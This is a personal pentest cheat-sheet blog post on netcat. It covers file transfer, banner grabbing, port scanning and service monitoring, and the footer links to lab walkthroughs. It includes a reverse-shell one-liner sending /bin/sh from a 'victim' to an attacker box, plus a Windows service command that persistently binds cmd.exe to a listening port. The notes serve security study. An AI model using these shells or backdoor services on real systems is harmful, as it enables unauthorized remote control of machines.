Skip to main content

Netcat / Nc. without e support, scan using nc which ports are listening

how to move files between 2 systems using nc. works on both linux and windows.


on source/sending machine
     #nc --lvp 2222 < sending_this_file.txt
on target/receiving machine
    #nc -nv target_ip_address 2222  > receiving_this_file.txt


Building off of the previous example, we can accomplish more useful tasks.
Because we are establishing a regular TCP connection, we can transmit just about any kind of information over that connection. It is not limited to chat messages that are typed in by a user. We can use this knowledge to turn netcat into a file transfer program.
Once again, we need to choose one end of the connection to listen for connections. However, instead of printing information onto the screen, as we did in the last example, we will place all of the information straight into a file:
  • netcat -l 4444 > received_file
On the second computer, create a simple text file by typing:
  • echo "Hello, this is a file" > original_file
We can now use this file as an input for the netcat connection we will establish to the listening computer. The file will be transmitted just as if we had typed it interactively:
  • netcat domain.com 4444 < original_file
We can see on the computer that was awaiting a connection, that we now have a new file called "received_file" with the contents of the file we typed on the other computer:
  • cat received_file

output
Hello, this is a file


=========================================================

# nc [targetIP] [remote_port]  => netcat client connects to a target service, and pull back its service info
(e.g. nc 1.2.3.4 21, nc 1.2.3.4 80 ;  for port 80 you may have to enter HEAD / HTTP/1.0 followed by 2 enter to get a response back from the iis server.

=========================================================

# echo "" | nc -v -n -w1 [target_ip] [port_range] ; ""=means display nothing. if we dont do this echo "", our netcat client will hang on the first open port, waiting forever for standard input from the keyboard, so we purposely echo nothing to close off the standard input.
(e.g  echo "" | nc -v -n -w1 1.2.3.4 1-100)  (<-- this will work in reverse order and possibly slow if run between vmware sessions)

=========================================================

# nc -v -l -p [local_port] (netcat listner can recieve client browser version while listening to the port 80)

=========================================================

# while (true); do nc -vv -z -w3 [target_ip] [target_port] > /dev/null && echo -e "\x07"; sleep 1; done

<-- (monitor for target_port and beeps if port is down; (-l=client;-vv=very verbose;-z=sending no data; and waiting not more than 3 sec to make a connection to the target ip. as long as this netclient clent can make a connection successfully (&&), we want to print BEL character )

=========================================================

# while `nc -vv -z -w3 [target_ip] [target_port] > /dev/null` ; do echo "Service is ok"; sleep 1; done; echo "Service is dead"; echo -e "\x07"

<-- ( `=this is backtick, the key next to number 1 key, pressed w/o shift, prints a mesg when the service is ok and beeps when service is dead)

=========================================================

windows>nc.ex -n -vv -w3 target_ip_address 1-100

netcat port scanning (in reverse orde). -n tells netcat not to resolve names in DNS. -vv tells it be very verbose, priting information on standard error when it can make a connection on a port, as well as different message when it cannot make connection. the -w3 tells it to wait no more than 3 seconds on any port, moving on if  port is open after a short pause adn giving up on closed ports after the timeout expires.

================
interact with a service

windows>sc \\hostname start service_name
windows>sc
\\hostname delete service_name
windows>sc
\\hostname query service_name

============
creating a service:

this will be killed after 30 sec since it does not make an API  call back saying that the service started sucessfully.

windows>sc \\%computername% create ncservice2 binpath= "c:\tools\nc.exe -l -p 2222 -e cmd.exe"

==============
creating a service:

this will be killed after 30 sec since it does not make an API  call back saying that the service started sucessfully. making it stick:

windows>sc \\%computername% create ncservice2 binpath= "cmd.exe /k c:\tools\nc.exe -l -p 2222 -e cmd.exe"

=============
# wc -z -vv -w 1 192.168.1.100 20-25
port scan using netcat/nc. identifying ports on a target. scanned from ports 20 through 25

=============
without e support
skodo@pentestbox# nc -nvlp 443
victim$ mknod /tmp/backpipe p 
victim$ /bin/sh 0</tmp/backpipe | nc pentestbox 443 1>/tmp/backpipe
=============
scan using nc which ports are listening
-netcat -z -n -v 198.51.100.0 1-1000
- netcat -z -n -v 198.51.100.0 1-1000 2>&1 | grep opeen

Comments

Popular posts from this blog

28 VM SecOS-1

Walkthru: Notes: A. https://c0d3g33k.blogspot.com/2017/01/secos.html [capture admin cookie using 127.0.0.1 in a code  test.html  with cross site scripting vulnerability,  CSRF attack, use exploit 37088 for priv escalation ] B. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [ Hacking Node.js and MangoDB   ] c. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [use wget to post data from CLI. Add other cmds to ping cmd using curl and wget] D. https://chousensha.github.io/blog/2015/02/04/pentest-lab-secos/ [SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI] Notes: # Nmap 7.70 scan initiated Thu Jul 19 09:26:05 2018 as: nmap -sV -O -oN ../reports/192.168.117.6/192.168.117.6.nmap 192.168.117.6 Nmap scan report for 192.168.117.6 Host is up (0.00042s latency). Not shown: 998 closed ports PORT     STATE SERVICE VERSION 22/tcp   open  ssh  ...

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...

VM 15: Kioptix 2014

Walkthru Notes 2nd approach  using nc via web using php reverse shell 3rd approach   w/o metasploit =================== walkthru: 1.  Updating OpenFuck Exploit(764) but it didnt work here @ https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ 2. ============== Notes: 80/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC) Running: FreeBSD 9.X|10.X OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10 OS details: FreeBSD 9.0-RELEASE - 10.3-RELEASE PORT     STATE SERVICE VERSION 8080/tcp open  http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) |_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 |_http-title: 403 Forbidden MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox...